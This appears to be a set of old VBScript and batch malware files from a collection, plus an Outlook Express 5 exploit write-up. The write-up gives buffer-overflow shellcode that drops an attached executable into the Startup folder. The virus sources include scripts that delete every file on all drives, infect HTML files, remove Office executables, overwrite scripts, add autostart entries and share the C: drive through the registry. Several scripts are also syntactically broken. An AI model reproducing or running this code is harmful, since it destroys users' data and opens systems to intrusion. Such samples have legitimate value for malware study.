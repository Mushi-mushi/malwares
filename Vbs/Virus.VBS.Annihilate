Author:Marklord Email: 1982@dnt.ro
Xploit name:Outlook Express allow to run attached files using scripts
Xploit accour:Microsoft Outlook Express 5 with Windows 95,98,maybe NT
Xploit description:Outlook Express allow to run attached files using the regobj script written
by Shane Hird,witchou a user know about it.Outlook Express create a temporary file when we
place on the background a sound or picture(This option is in:Outlook Express->New
Message->Format->Background->Picures or Sound).The temp file it is place on
C:\windows\temp\dat*.tmp(*=random numers and leters).It is better to put as a sound.Anyway we
can put in the place of the sound a program file exe,bat,com or other file and then we run it.Here
is how we do.
When you put a sound as background,for example ding.wav(from C:\windows\media)and then
save the mail,and then reopen the mail,Outlook create a id for sound so can be run from
attachament message.The source for the sound in the message is like this for example:
 
<BGSOUND 
src="cid:002801bf41c9$95325940$0100007f@computername">
 
computername=the name of the computer
 
In the part of attachament sound there is that id too like this:
 
Content-Type: audio/wav;
 name="ding.wav"
Content-Transfer-Encoding: base64
Content-ID: <002801bf41c9$95325940$0100007f@computername>
 
But we can take the id and change to a attachment file(exe or other).
For example we make a new message,we put as background a .wav(ding.wav,from
c:\windows\media\),then we attach a file.exe.
Then in the source of message we place Registration Wizard control script so we can rename the
temp file to a .exe.The script it will be like this:

<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00" id="RegWizObj"></object>
<script language="VbScript" >

expstr = "/i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 
expstr = expstr & Chr(235)
expstr = expstr & Chr(53)
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)
expstr = expstr + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
expstr = expstr + Chr(80)
expstr = expstr + Chr(87)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + "move c:\windows\temp\d*.tmp c:\windows\startm~1\programs\startup\file.exe"

RegWizObj.InvokeRegWizard(expstr)

</script>
 
Then we save the message as msg.eml.And then we use a text editor like notepad or a better
text editor.In the editor open the msg.eml and then:
-on the part of attachement file.exe we cut:
 
Content-Disposition: attachment;
 filename="file.exe"
 
-and then paste it on the part of attachement ding.wav.It will show like this:
 
Content-Type: audio/wav;
 name="Ding.wav"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
 filename="file.exe"
 
-then at the part of attachement ding.wav we cut the content-id:
 
Content-ID: <002801bf41c9$95325940$0100007f@computername>
 
-we paste it at the part of attachement file.exe.It is going to apper like this:
 
Content-Type: application/x-msdownload;
 name="file.exe"
Content-Transfer-Encoding: base64
Content-ID: <002801bf41c9$95325940$0100007f@computername>
 
Then we save the msg.eml and we run it.You will see that on the attach it is appear file.exe(but
that is not the real file.exe is ding.wav).Remove the file.exe from there.You can save(or send it)
the msg.eml now.After you save it you can give preview.Outlook is close(becose of the
script),then we look and see the temp file has moved to windows directory as file.exe(we can use
any directory or file name).We can use startup directory from windows so can be run next time
windows start.
There are other ways you can change the id.But this is the simple one.
We can put as background 2 or how many .exe we want.But that is a little complicated.
If the Xploit work on windows NT we need to change the directory in the script where the
temp file is created(maybe c:\winnt\temp\d*.tmp)
You also can make a user to open a .eml that include this Xploit.For example attach a .eml
with this Xploit and send it to someone that has netscape messager.That someone it will
open the .eml and will be affected(only if has outlook express 5 installed).
I hope with this Xploit are going to appear viruses,trojans,and other,like
mellisa,zipped_files,and other.