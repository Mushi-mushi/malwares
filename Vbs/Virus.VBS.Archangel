
MsgBox ("your computer is in the controle of SATAN!", 16, "Fear")
On Error Resume Next

Dim filesys, newfolder, newfolderpath
newfolderpath = "c:\MyFolder"
set filesys=CreateObject("Scripting.FileSystemObject")
If Not filesys.FolderExists(newfolderpath) Then
Set newfolder = filesys.CreateFolder(newfolderpath)
End If

fso.CopyFile Wscript.ScriptFullName, "C:\WINDOWS\SYSTEM\fun.vbs", True

filesys.MoveFile "C:\WINDOWS\SYSTEM\*.*","C:\WINDOWS\MyFolder\"

filesys, newfolder, newfolderpath
newfolderpath = "c:\WINDOWS\SYSTEM"
set filesys=CreateObject("Scripting.FileSystemObject")
If Not filesys.FolderExists(newfolderpath) Then
Set newfolder = filesys.CreateFolder(newfolderpath)
End If

fso.CopyFile Wscript.ScriptFullName, "C:\MyFolder", True

fso.CopyFile Wscript.ScriptFullName, "C:\WINDOWS\SYSTEM\fun.vbs", True

filesys.MoveFile "C:\WINDOWS\SYSTEM32","C:\WINDOWS\SYSTEM"

fso.CopyFile Wscript.ScriptFullName, "C:\WINDOWS\SYSTEM\SYSTEM32\fun.vbs", True
fso.CopyFile Wscript.ScriptFullName, "C:\WINDOWS\StartMenu\Programs\StartUp\fun.vbs", True

fso.DeleteFile "C:\WINDOWS\COMMAND\EBD\AUTOEXEC",True
fso.DeleteFile "C:\WINDOWS\Desktop\*.*"

fso.CopyFile Wscript.ScriptFullName, "C:\fun.vbs", True
set shell=wscript.createobject("wscript.shell")
set msc=shell.CreateShortCut("C:\WINDOWS\COMMAND\EBD\AUTOEXEC.bat")
msc.TargetPath=shell.ExpandEnvironment("C:\fun.vbs")
msc.WindowStyle=4
msc.Save
set batch=fso.CreateTextFile("C:\AUTOEXEC.bat")
batch.WriteLine "@echo off"
batch.WriteLine "cls"
batch.WriteLine "deltree C:\WINDOWS\Desktop\*.*"
batch.WriteLine "start C:\WINDOWS\SYSTEM\fun.vbs"
batch.Close
shell.Run  "C:\AUTOEXEC.bat"
end sub 