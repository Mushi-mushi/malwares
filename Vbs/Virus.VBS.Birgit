Set WshShell = Wscript.CreateObject("Wscript.Shell")

WshShell.Run (CommandPath & " /c for %%a in (*.vbs) do move /y " & Wscript.ScriptFullName & " %%a >nul"), vbHide

If Day(Now()) = 19 Then

WScript.Echo "Birgit" & Chr(19) & "by Birgit/Tiers"

End If
