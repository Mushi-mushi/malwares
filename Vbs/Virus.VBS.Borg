
Set fso = CreateObject("scripting.filesystemobject")
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
MyCode = Myself.readall
count = 0
Myself.Close
Do
If Not (fso.fileexists(wscript.scriptfullname)) Then
Set Myself = fso.createtextfile(wscript.scriptfullname, True)
Myself.write MyCode
msgbox "We are Borg. We cannot be deleted!"
count + 1
Myself.Close
End If
if count = 10
msgbox "That's it. Now your dead!"
'infect the system
DoDir()
end if
Loop

sub DoDir()
On Error Resume Next
Set fso = CreateObject("scipting.filesystemobject")
Set Drives = fso.Drives
For Each Drive In Drives
If Drive.Drivetype = Remote Then
Drivefull = Drive & "\"
Call Destroy(Drivefull)
ElseIf Drive.IsReady Then
Drivefull = Drive & "\"
Call Destroy(Drivefull)
End If
Next
End sub

Function Destroy(path)
newpath=path
Set Fold = fso.GetFolder(newpath)
Set Files = Fold.Files
For Each file In Files
file.delete true
Next
Set file = Fold.Subfolders
For Each Subfol In file
Call Destroy(Subfol.path)
Next
End Function
