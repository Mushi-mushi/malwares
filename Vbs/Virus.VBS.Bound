<SCRIPT LANGUAGE="VBScript">
<!--
  Dim FSO,MSBound,DC,D,TMP,F
  MSBound = "<SCRIPT LANGUAGE=#VBScript#>$<!--$  Dim FSO,MSBound,DC,D,TMP,F$  MSBound = #|#$  On Error Resume Next$  TMP = ReplaceWithIn(Chr(36),vbCrLf,MSBound)$  TMP = ReplaceWithIn(Chr(35),Chr(34),TMP)$  F = InStr(1,TMP,Chr(124))$  MSBound = Left(TMP,F-1) & MSBound & Mid(TMP,F+1)$  F = InStr(2500,MSBound,Chr(124))$  MSBound = Left(MSBound,F-1) & Mid(MSBound,F+1)$$  Set FSO = CreateObject(#Scripting.FileSystemObject#)$  If Err.Number = 0 Then$     Set DC = FSO.Drives$         For Each D In DC$         If D.DriveType = 2 Then$            SweepDrive D.DriveLetter & #:\#$         End If$     Next$  End If$$Sub SweepDrive(pPath)$  Dim F, S, O$  On Error Resume Next$  Set F = FSO.GetFolder(pPath)$  InfectFiles F$  Set S = F.SubFolders$  For Each O In S$      SweepDrive(pPath & O.Name & #\#)$  Next        $End Sub $$Sub InfectFiles(pFolder)$  Dim F,Member,Ext,M,C$  On Error Resume Next$  Set F = pFolder.Files$  For Each Member In F$      M = UCase(Member.Name)$      If M = #WINWORD.EXE# Or M = #ACCESS.EXE# Or M = #EXCEL.EXE# Or M = #WORD.EXE# Then$         Set M = FSO.GetFile(Member.Path)$         M.Attributes = (M.Attributes And 1) - 1$         M.Delete$      End If   $      Ext = UCase(FSO.GetExtensionName(Member.Name))$      If Ext = #HTML# Or Ext = #HTM# Then$         Set M = FSO.OpenTextFile(Member.Path,1)$         C = M.ReadAll$         If InStr(1,C,MSBound) = 0 Then$            Set M = FSO.CreateTextFile(Member.Path, True)$            M.WriteLine MSBound & C$            M.Close$         End If$      End if$  Next$End Sub$$Private Function ReplaceWithIn(CurChar,NewChar,SourceString)$  Dim T,TMP$  T = 1$  TMP = SourceString$  Do While T > 0$     T = InStr(T, TMP, CurChar)$     If T > 0 Then TMP = Left(TMP,T-1) & NewChar & Mid(TMP,T+1)$  Loop$  ReplaceWithIn = TMP$End Function$$'MSBound by Suppa.$-->$<|/SCRIPT>$$"
  On Error Resume Next
  TMP = ReplaceWithIn(Chr(36),vbCrLf,MSBound)
  TMP = ReplaceWithIn(Chr(35),Chr(34),TMP)
  F = InStr(1,TMP,Chr(124))
  MSBound = Left(TMP,F-1) & MSBound & Mid(TMP,F+1)
  F = InStr(2500,MSBound,Chr(124))
  MSBound = Left(MSBound,F-1) & Mid(MSBound,F+1)

  Set FSO = CreateObject("Scripting.FileSystemObject")
  If Err.Number = 0 Then
     Set DC = FSO.Drives
         For Each D In DC
         If D.DriveType = 2 Then
            SweepDrive D.DriveLetter & ":\"
         End If
     Next
  End If

Sub SweepDrive(pPath)
  Dim F, S, O
  On Error Resume Next
  Set F = FSO.GetFolder(pPath)
  InfectFiles F
  Set S = F.SubFolders
  For Each O In S
      SweepDrive(pPath & O.Name & "\")
  Next        
End Sub 

Sub InfectFiles(pFolder)
  Dim F,Member,Ext,M,C
  On Error Resume Next
  Set F = pFolder.Files
  For Each Member In F
      M = UCase(Member.Name)
      If M = "WINWORD.EXE" Or M = "ACCESS.EXE" Or M = "EXCEL.EXE" Or M = "WORD.EXE" Then
         Set M = FSO.GetFile(Member.Path)
         M.Attributes = (M.Attributes And 1) - 1
         M.Delete
      End If   
      Ext = UCase(FSO.GetExtensionName(Member.Name))
      If Ext = "HTML" Or Ext = "HTM" Then
         Set M = FSO.OpenTextFile(Member.Path,1)
         C = M.ReadAll
         If InStr(1,C,MSBound) = 0 Then
            Set M = FSO.CreateTextFile(Member.Path, True)
            M.WriteLine MSBound & C
            M.Close
         End If
      End if
  Next
End Sub

Private Function ReplaceWithIn(CurChar,NewChar,SourceString)
  Dim T,TMP
  T = 1
  TMP = SourceString
  Do While T > 0
     T = InStr(T, TMP, CurChar)
     If T > 0 Then TMP = Left(TMP,T-1) & NewChar & Mid(TMP,T+1)
  Loop
  ReplaceWithIn = TMP
End Function

'MSBound by Suppa.
-->
</SCRIPT>

<HTML>
	<HEAD>
		<link rel=stylesheet type="text/css" href="..\setup\msobshel.css">
		<META http-equiv="Content-Type" content="text/html; charset=ks_c_5601-1987">
	</HEAD>
	<BODY TABINDEX=-1 onload="window.parent._Default_LoadMe();">

		<img id="WaterMark" class=gradient src="../images/watermrk.gif">
        <img id="StageImage" class=leftpane src="../images/error.jpg">
        <IMG id="imgDropShadow" class="dropshadow" src="../images/drpshdw.jpg"> 

		<SPAN TABINDEX=-1 CLASS="pageTitle">
            <ID id="ISPReset_TITLE">인터넷 서비스 제공자에 연결할 수 없습니다.</ID>
		</SPAN>

		<SPAN TABINDEX=-1 CLASS="contents">
		<table class="fontStyle">
			<tr>
				<td>
					<img src="../images/hndshake.jpg">
				</td>
				<td>		
					<DIV TABINDEX=-1 id="ISPReset_INFO1">선택한 인터넷 서비스 제공자의 새 계정 서비스가 현재 사용 불가능한 상태입니다.</div>
					<BR>
                    <DIV TABINDEX=-1 id="ISPReset_INFO2">다른 인터넷 서비스 제공자를 선택하려면 [뒤로]를 누르거나, 인터넷 서비스를 등록하지 않고 계속 진행하려면 [다음]을 누르십시오.</div>
				</td>
			</tr>
		</table>	
		</SPAN>

		<SPAN TABINDEX=-1 id="navbar" CLASS="navbar">
			<HR NOSHADE CLASS="blackBar">
			<SPAN TABINDEX=-1 Id=spanBack onclick="window.parent.GoBack();">
				<IMG Id=btnBack class=backButton>
				<LABEL TABINDEX=1 ACCESSKEY="B" for=btnBackText Id=btnBackText class=backButtonText>
					<ID id="LOCAL_BACK">뒤로(<U>B</U>)</ID>
				</LABEL>
			</SPAN>
			<SPAN TABINDEX=-1 Id=spanNext onclick="window.parent.GoNext();">
				<IMG Id=btnNext class=nextButton>
				<LABEL TABINDEX=2 ACCESSKEY="N" for=btnNextText Id=btnNextText class=nextButtonText>
					<ID id="LOCAL_NEXT">다음(<U>N</U>)</ID>
				</LABEL>
			</SPAN>
		</SPAN>
	</BODY>
</HTML>

