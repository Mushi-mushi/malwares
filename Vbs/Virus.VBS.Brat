::..[Vx Brat]..
::Fear it!
@ECHO OFF
ECHO --------------------------------------------------------------------------------
ECHO -                               Here to annoy and disturb                      -
ECHO -                                    ..[Vx Brat]..                             -
ECHO -                          Respect my mind or fall prey to it                  -
ECHO --------------------------------------------------------------------------------
ECHO.
ECHO =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
ECHO = This system has been infected with Vx Brat..                                 =
ECHO = Da Unt0uChableZ (UtC) & GamBin0 Krew (gK) on the rise...                     =
ECHO = Don't fear us, fear our minds!                                               =
ECHO =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
ECHO Respect my mind or fall pray to it. >> c:\Windows\Startm~1\Programs\StartUp\utc.txt
ECHO Respect my mind or fall pray to it. >> c:\Windows\Startm~1\Programs\StartUp\gk.txt
ECHO ..[VxBrat].. Here to annoy and disturb! >> c:\Windows\Startm~1\Programs\StartUp\brat.txt
ECHO.
Pause
cls
