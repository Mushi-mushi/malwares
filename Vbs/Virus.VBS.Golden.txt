Set WSHShell = WScript.CreateObject("WScript.Shell")
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\!\Flags", 402, "REG_DWORD"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\!\Type", 0, "REG_DWORD"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\!\Path", "C:\"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\!\Parm1enc", -1837192444, "REG_BINARY"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\!\Remark", "GoldenKey"
'GoldenKey By Lys Kovick